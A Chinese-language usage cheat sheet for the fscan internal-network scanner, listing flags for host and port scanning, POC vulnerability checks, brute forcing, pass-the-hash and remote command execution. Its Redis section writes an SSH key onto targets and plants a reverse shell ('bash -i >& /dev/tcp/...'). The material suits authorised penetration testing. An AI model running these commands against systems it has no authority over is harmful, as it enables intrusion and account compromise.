一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。

以 192.168.1.1 为目标IP。


常用命令

基本扫描

# 扫描目标网段,但排除 .1 和 .254
fscan -h 192.168.1.1/24 -hn 192.168.1.1, 192.168.1.254
# 扫描文件中的目标IP
fscan -hf ip.txt
# 仅进行主机发现的扫描
fscan -h 192.168.1.1/24 -nopoc -noredis -nobr
# 优化线程数和超时时间,提升扫描效率
fscan -h 192.168.1.1/24 -t 1000 -time 1
# 将输出结果保存为文件
fscan -h 192.168.1.1/24 -o result.txt

端口扫描

# 指定端口扫描
fscan -h 192.168.1.1 -p 22,80,443,3306
# 仅进行端口扫描,跳过漏扫和暴破
fscan -h 192.168.1.1 -p 1-65535 -nopoc -noredis -nobr

基础设置

IP 配置

用于指定要扫描的目标主机或范围。

# 指定单个 IP、IP 段或多个 IP
fscan -h 192.168.1.1 -h <string>
fscan -h 192.168.1.1 -h 192.168.1.1
fscan -h 192.168.1.1 -h 192.168.1.1-255
fscan -h 192.168.1.1 -h 192.168.1.1,192.168.1.2
# 从文件中读取目标主机列表
fscan -h 192.168.1.1 -hf <string>
fscan -h 192.168.1.1 -hf ip.txt
# 排除某些主机
fscan -h 192.168.1.1 -hn <string>
fscan -h 192.168.1.1 -hn 192.168.1.1/24

端口配置

控制要扫描的端口范围或排除特定端口。

# 指定要扫描的端口
fscan -h 192.168.1.1 -p <string>
fscan -h 192.168.1.1 -p 22
fscan -h 192.168.1.1 -p 1-65535
fscan -h 192.168.1.1 -p 22,80,3306
# 在默认端口基础上*添加*额外端口
fscan -h 192.168.1.1 -pa <string>
fscan -h 192.168.1.1 -pa 3389
# *不扫描*指定端口
fscan -h 192.168.1.1 -pn <string>
fscan -h 192.168.1.1 -pn 445
# 从文件中读取端口列表
fscan -h 192.168.1.1 -portf <string>
# 跳过 ping 检测(即不判断主机是否存活)
fscan -h 192.168.1.1 -np

注:默认端口为 21, 22, 80, 81, 135, 139, 443, 445, 1433, 1521, 3306, 5432, 6379, 7001, 8000, 8080, 8089, 9000, 9200, 11211, 27017


URL 配置

# URL
fscan -h 192.168.1.1/24 -u <string>
# URL 文件
fscan -h 192.168.1.1/24 -uf <string>

其他基础配置

# 设置 HTTP/HTTPS 代理
fscan -h 192.168.1.1/24 -proxy <string>
fscan -h 192.168.1.1/24 -proxy http://127.0.0.1:8080
# 线程数(默认 600)
fscan -h 192.168.1.1/24 -t <int>
# 设置超时时间(默认 3)
fscan -h 192.168.1.1/24 -time <int>
# 设置网页超时(默认 5)
fscan -h 192.168.1.1/24 -wt <int>
# 指定结果输出文件
fscan -h 192.168.1.1/24 -o <string>
fscan -h 192.168.1.1/24 -o result.txt
# 以 JSON 格式输出结果
fscan -h 192.168.1.1/24 -json
# 不保存输出日志
fscan -h 192.168.1.1/24 -no
# 错误日志记录频率(默认每 60 秒记录一次)
fscan -h 192.168.1.1/24 -debug <int>
# 关闭彩色输出(适用于日志或管道处理)
fscan -h 192.168.1.1/24 -nocolor
# 使用系统 `ping` 命令替代 ICMP 探测(兼容性更好)
fscan -h 192.168.1.1/24 -ping

漏洞扫描与利用

控制是否执行漏洞检测、使用哪些 POC、代理等。

# 指定扫描模块(如 -m ssh),默认为 "all"
fscan -h 192.168.1.1/24 -m <string>
# 仅使用包含指定名称的 POC(如 `-pocname weblogic`)
fscan -h 192.168.1.1/24 -pocname <string>
# 自定义 POC 脚本路径
fscan -h 192.168.1.1/24 -pocpath <string>
# 为 Web POC 设置 Cookie(如 `-cookie rememberMe=login`)
fscan -h 192.168.1.1/24 -cookie <string>
# 启用 DNS 日志型 POC(用于带外检测)
fscan -h 192.168.1.1/24 -dns
# intPOC 成功率阈值(默认 20)
fscan -h 192.168.1.1/24 -num <int>
# 执行完整 POC 扫描(如 `shiro 100 key`)
fscan -h 192.168.1.1/24 -full
# 跳过 Web 漏洞扫描
fscan -h 192.168.1.1/24 -nopoc

命令执行

# 执行命令(支持 `ssh`、`wmiexec` 等)
fscan -h 192.168.1.1/24 -c <string>

Redis 相关选项

# 通过 Redis 写入 SSH 公钥文件
fscan -h 192.168.1.1/24 -rf <string>
fscan -h 192.168.1.1/24 -rf id_rsa.pub
# 通过 Redis 写入 C 反弹 Shell
fscan -h 192.168.1.1/24 -rs <string>
fscan -h 192.168.1.1/24 -rs "bash -i >& /dev/tcp/..."
#跳过 Redis 安全测试
fscan -h 192.168.1.1/24 -noredis 

四、暴力破解(Brute Force)

控制是否进行密码爆破及相关参数。

# 暴力破解线程数(默认 1)
fscan -h 192.168.1.1/24 -br <int>
# 指定单个密码
fscan -h 192.168.1.1/24 -pwd <string>
# 在默认密码库基础上*添加*密码
fscan -h 192.168.1.1/24 -pwda <string>
fscan -h 192.168.1.1/24 -pwda admin123
# 从文件加载密码字典
fscan -h 192.168.1.1/24 -pwdf <string>
# 禁用密码暴力破解
fscan -h 192.168.1.1/24 -nobr

五、认证与凭证(Authentication)

用于 SMB、SSH 等协议的身份验证。

# SMB 域名
fscan -h 192.168.1.1/24 -domain <string>
# 传递哈希(如 NTLM hash)
fscan -h 192.168.1.1/24 -hash <string>
# 用于 fcgi 或 SMB 的远程文件路径
fscan -h 192.168.1.1/24 -path <string>